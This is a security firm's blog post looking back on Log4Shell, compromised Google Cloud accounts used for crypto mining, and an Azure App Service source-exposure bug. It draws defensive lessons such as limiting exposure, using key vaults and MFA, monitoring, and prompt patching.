|Tony Thomas||Sean Whiting|
2021 kept cybersecurity professionals busy – from the fallout of SolarWinds at the start of the year to Log4j at the close. By March of 2021, there were 1,291 breaches recorded, 95% of which were the result of human error. In this article, we explore three specific security events and the lessons that can be learned from them: Log4Shell, compromised Google Cloud accounts used for cryptocurrency mining, and a 4-year-old bug in Azure App Services. Taking the time to reflect on these events of last year can help organizations prepare for the challenges, trends, and events of 2022.
Understanding the Log4j Vulnerability
The zero-day Log4j vulnerability (called Log4Shell One) was one of the most critical vulnerabilities in years, receiving a CVSS score of 10. This vulnerability exploited the Log4j API to give remote code execution capabilities. The widespread use of Log4j across virtually all Java applications, as well as the ease of exploitation, made this vulnerability exceptionally critical. (We explore this vulnerability and how to address it more in this blog post).
Lesson Learned: Get Back to the Basics
Supply chain attacks inevitably require a variety of mitigation mechanisms. First, it’s important to go back to security basics. If internal apps are invisible to the internet, they cannot be manipulated from an outside/unauthorized source. This is security 101: Do not expose an application publicly if unnecessary. Additionally, a zero-trust network design helps protect your attack surface as it reduces the impact of a compromised account and malicious internal network access. Finally, application segmentation ensures compromised infrastructure for one application does not impact another. While none of these lessons are necessarily new, the Log4j vulnerability was a great reminder of the value of cybersecurity basics and how they can reduce your organization’s attack surface and lateral movement susceptibility.
Preventing Google Cloud Platform Account Crypto Mining
Also in 2021, Google’s Cybersecurity Action Team (CAT) released an analysis on compromised Google Cloud Platform (GCP) accounts and how they are being used to mine cryptocurrency. Of the 50 compromised instances they reviewed, 86% were used for crypto mining. Their analysis revealed this occurred "due to poor hygiene and a lack of basic control implementation.” GCP and the other major CSPs have made incredible headway with their native misconfiguration management tools (e.g., Google’s Security Command Center), but misconfigurations and leaked credentials still run rampant.
Lesson Learned: Invest in Key Vaults
Leaked credentials continue to be an issue for organizations because employees still improperly store them in GitHub, leave them on sticky notes on a computer, and have overall poor password hygiene. These practices are inexcusable as there are many cloud-native tools that are designed to store credentials and secrets in key vaults. Key vaults allow organizations to securely store credentials and secrets and limit access to only authenticated users. This includes API keys, certificates, cryptographic keys, and passwords. Using a key vault keeps critical information secure. Key vaults are also more efficient. They save users time by using autorotation, and they eliminate the need manually change every password and key across systems.
Also, this is your regular reminder to apply MFA across all your cloud users. If your organization has not done that, please stop reading this post and go take care of that.
Mitigating the Azure App Bug
Lastly, in 2021 a security flaw was detected in Microsoft Azure App Service. The kicker? It had existed since 2017. The vulnerability could have led to the exposure of source code in customer applications written in Java, Node, PHP, Python, and Ruby. All the malicious actors had to do was fetch the ‘/.git’ file from the target app and retrieve its source code. This could have resulted in compromised credentials stored in the source code or further targeted application attacks after source code analysis.
Lesson Learned: Monitor, Monitor, Monitor
Microsoft advised developers and administrators to consistently review and limit cloud services that have external IPs. In this case, there was no misconfiguration, but this issue was a good a reminder of the risk inherent to cloud services. Cloud security monitoring can help detect malicious activity on your applications. Additionally, organizations should configure notifications for security bulletins that arise from their CSPs. Attackers are always watching for vulnerabilities, and they will race to exploit them as soon as they disclosed. Defenders must have the same vigilance when applying patches.
These three cybersecurity events from 2021 highlight the range of risk internal Commercial-Off-the-Shelf (COTS) software, cloud misconfigurations, and cloud service inherent imperfection present to developers and organizations. So, let’s kick off 2022 with an important reminder: Embrace the basics. Limit externally facing applications, apply MFA, monitor vendor bulletins, patch with urgency, and work through your misconfiguration backlog. With these core practices in place, organizations will be well-armed to meet the challenges and threats of 2022.
Want more cybersecurity insights in your inbox?
Subscribe to Focal Point's Risk Rundown below - a once-a-month newsletter with templates, webinars, interesting white papers, and news you may have missed. Thousands of your colleagues and competitors have signed up! You can unsubscribe at any time.